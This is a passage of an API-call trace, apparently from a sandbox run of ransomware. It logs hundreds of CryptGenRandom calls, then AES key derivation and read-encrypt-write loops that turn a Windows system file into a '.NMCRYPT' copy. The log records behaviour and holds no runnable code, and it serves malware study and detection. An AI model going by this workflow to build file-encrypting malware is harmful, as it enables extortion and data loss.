| out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.264] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.265] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.266] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.266] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.266] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0159.267] CryptHashData (hHash=0x9ad838, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.267] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad2b8) returned 1 [0159.267] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0159.267] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0159.267] wcslen (_String="\\\\?\\") returned 0x4 [0159.267] CryptDuplicateKey (in: hKey=0x9ad2b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad5b8) returned 1 [0159.267] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0159.267] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0159.268] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0159.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0159.268] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.269] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.269] GetLastError () returned 0x0 [0159.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.272] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.272] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.272] GetLastError () returned 0x0 [0159.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.273] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.273] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.273] GetLastError () returned 0x0 [0159.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.273] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.273] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.273] GetLastError () returned 0x0 [0159.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.273] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.273] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.273] GetLastError () returned 0x0 [0159.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.273] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.273] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.273] GetLastError () returned 0x0 [0159.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.273] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.273] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.273] GetLastError () returned 0x0 [0159.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.274] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.274] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.274] GetLastError () returned 0x0 [0159.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.274] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.274] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.274] GetLastError () returned 0x0 [0159.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 